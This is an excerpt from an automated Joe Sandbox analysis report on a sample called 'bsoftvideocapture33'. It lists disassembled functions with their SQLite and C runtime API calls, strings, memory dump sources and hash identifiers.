                                                                                                                                        • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                                                                        • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                                                        • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                                                                        Strings
                                                                                                                                        • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                                                                        • String ID: Invalid argument to rtreedepth()
                                                                                                                                        • API String ID: 1063208240-2843521569
                                                                                                                                        • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                                                        • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                                                                        • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                                                        • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID: soft_heap_limit
                                                                                                                                        • API String ID: 1251656441-405162809
                                                                                                                                        • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                                                        • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                                                                        • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                                                        • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C0EB1C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C0EB31
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 4063778783-2104205924
                                                                                                                                        • Opcode ID: ccb465003c583449fe33ae32e7af4e083687f1a2f679bcc3c7dee3a2a3de3046
                                                                                                                                        • Instruction ID: efb6899d1f74b6821e2a76dc8c02cfba02d90c113cd44433b1570aa09cd49581
                                                                                                                                        • Opcode Fuzzy Hash: ccb465003c583449fe33ae32e7af4e083687f1a2f679bcc3c7dee3a2a3de3046
                                                                                                                                        • Instruction Fuzzy Hash: FEF027B0600319ABEF04E6A8DC859EF73FC9F40604B100469E612E36C0FF70EA149A95
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03C1B
                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 02C03C30
                                                                                                                                          • Part of subcall function 02C114C7: std::exception::exception.LIBCMT ref: 02C114D1
                                                                                                                                          • Part of subcall function 02C0965C: __EH_prolog.LIBCMT ref: 02C09661
                                                                                                                                          • Part of subcall function 02C0965C: __CxxThrowException@8.LIBCMT ref: 02C0968A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                        • String ID: bad cast
                                                                                                                                        • API String ID: 1300498068-3145022300
                                                                                                                                        • Opcode ID: 1de363854d9984d18a37f3570e6dac58714a203877e31c09d2bccb72dcbefa14
                                                                                                                                        • Instruction ID: feeaf740cda108bce5825f38d14728d38372ec8c6a7c7c10bc2e3e570d6387e1
                                                                                                                                        • Opcode Fuzzy Hash: 1de363854d9984d18a37f3570e6dac58714a203877e31c09d2bccb72dcbefa14
                                                                                                                                        • Instruction Fuzzy Hash: BAF0A772900544CBC709DF58D4417EAB775EF52711F1001AEED0957241CB729A49DAD1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: NULL
                                                                                                                                        • API String ID: 632333372-324932091
                                                                                                                                        • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                                                        • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                                                                        • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                                                        • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C038D2
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C038F1
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        Strings
                                                                                                                                        • Year is out of valid range: 1400..10000, xrefs: 02C038E0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Year is out of valid range: 1400..10000
                                                                                                                                        • API String ID: 3258419250-2344417016
                                                                                                                                        • Opcode ID: d000f4b3bad371bb63ffc0b80b032972fa238d271feedef8bd7cd1fd2252aaf3
                                                                                                                                        • Instruction ID: 460318048f2ddcae682a1e71588eefd9adba6361ebb4d92ec2448a5af1c8c50c
                                                                                                                                        • Opcode Fuzzy Hash: d000f4b3bad371bb63ffc0b80b032972fa238d271feedef8bd7cd1fd2252aaf3
                                                                                                                                        • Instruction Fuzzy Hash: 50E0D872E402249BEB14EBD8C9517DDB779EB08720F04045EEC05776C0DEB52948DBD1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03886
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C038A5
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        Strings
                                                                                                                                        • Day of month value is out of range 1..31, xrefs: 02C03894
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Day of month value is out of range 1..31
                                                                                                                                        • API String ID: 3258419250-1361117730
                                                                                                                                        • Opcode ID: 3a367318bbd0030047930253121e95c9a7d3d2c0c18597bbb37b24498d7d2837
                                                                                                                                        • Instruction ID: b9b113a99d0f4f580204263facb7d66f9a274f97103c41c5c3d00e7ed20bed7a
                                                                                                                                        • Opcode Fuzzy Hash: 3a367318bbd0030047930253121e95c9a7d3d2c0c18597bbb37b24498d7d2837
                                                                                                                                        • Instruction Fuzzy Hash: 68E0D8B2E4022497E714EBD8C8517DDB779DB08B20F00089EEC02776C0DEB62948DBD1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0391E
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C0393D
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        Strings
                                                                                                                                        • Month number is out of range 1..12, xrefs: 02C0392C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Month number is out of range 1..12
                                                                                                                                        • API String ID: 3258419250-4198407886
                                                                                                                                        • Opcode ID: bb5abc2b2485e62ae397361d0216075e02a829e8d31ed40f14cee3517998dfc4
                                                                                                                                        • Instruction ID: 409b194623bb969942d067df54dd44b18fc2d37ba5955b983c35da7b74019e48
                                                                                                                                        • Opcode Fuzzy Hash: bb5abc2b2485e62ae397361d0216075e02a829e8d31ed40f14cee3517998dfc4
                                                                                                                                        • Instruction Fuzzy Hash: A2E0D872E4022497E724ABE8CC517EDB779EB08720F00045EEC01776C0DEB52948DBD1
                                                                                                                                        APIs
                                                                                                                                        • TlsAlloc.KERNEL32 ref: 02C019CC
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C019D9
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocErrorH_prologLast
                                                                                                                                        • String ID: tss
                                                                                                                                        • API String ID: 249634027-1638339373
                                                                                                                                        • Opcode ID: aa65ee8021a783825c1cf464431a48977ef282744b3119fb8f8883ae9ebc5463
                                                                                                                                        • Instruction ID: f4c79652417472e32b6bda48245bff5a86ba356431dbe9eea510a85d77d01494
                                                                                                                                        • Opcode Fuzzy Hash: aa65ee8021a783825c1cf464431a48977ef282744b3119fb8f8883ae9ebc5463
                                                                                                                                        • Instruction Fuzzy Hash: EEE08672D142205BC2107B78AC4818FBB949B41271F108B2AECAD832D0EE7059559BC6
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03BD8
                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 02C03BED
                                                                                                                                          • Part of subcall function 02C114C7: std::exception::exception.LIBCMT ref: 02C114D1
                                                                                                                                          • Part of subcall function 02C0965C: __EH_prolog.LIBCMT ref: 02C09661
                                                                                                                                          • Part of subcall function 02C0965C: __CxxThrowException@8.LIBCMT ref: 02C0968A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                        • String ID: bad cast
                                                                                                                                        • API String ID: 1300498068-3145022300
                                                                                                                                        • Opcode ID: 0a4fea98176e15716c4820deb64685cb518f81d486ae65006a1ec5c29b2ba816
                                                                                                                                        • Instruction ID: dc0d97a4fa2052c59e5177e9c020c3aa742b49045d5aff12f0732c049a938c3d
                                                                                                                                        • Opcode Fuzzy Hash: 0a4fea98176e15716c4820deb64685cb518f81d486ae65006a1ec5c29b2ba816
                                                                                                                                        • Instruction Fuzzy Hash: B2E0DFB1900148DBC704EF94C442BBCBB75EF11704F0040AC9D0A13290CF354A08DE82
                                                                                                                                        APIs
                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
                                                                                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocHeap$FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3499195154-0
                                                                                                                                        • Opcode ID: 2becd6c8e06833c8a4915773bf629a422f484b6d9e0f9157989f7b9aaac48440
                                                                                                                                        • Instruction ID: acd6d4547551bc59350702e4efe52eaae0a18fdbbc3be1f7c52cca1e76f34e40
                                                                                                                                        • Opcode Fuzzy Hash: 2becd6c8e06833c8a4915773bf629a422f484b6d9e0f9157989f7b9aaac48440
                                                                                                                                        • Instruction Fuzzy Hash: 35115E70210701DFC7208F28EE85A127BB5FB857207108A3DFA95E65F0D7769845DB08
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 682475483-0
                                                                                                                                        • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                                                        • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                                                                        • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                                                        • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2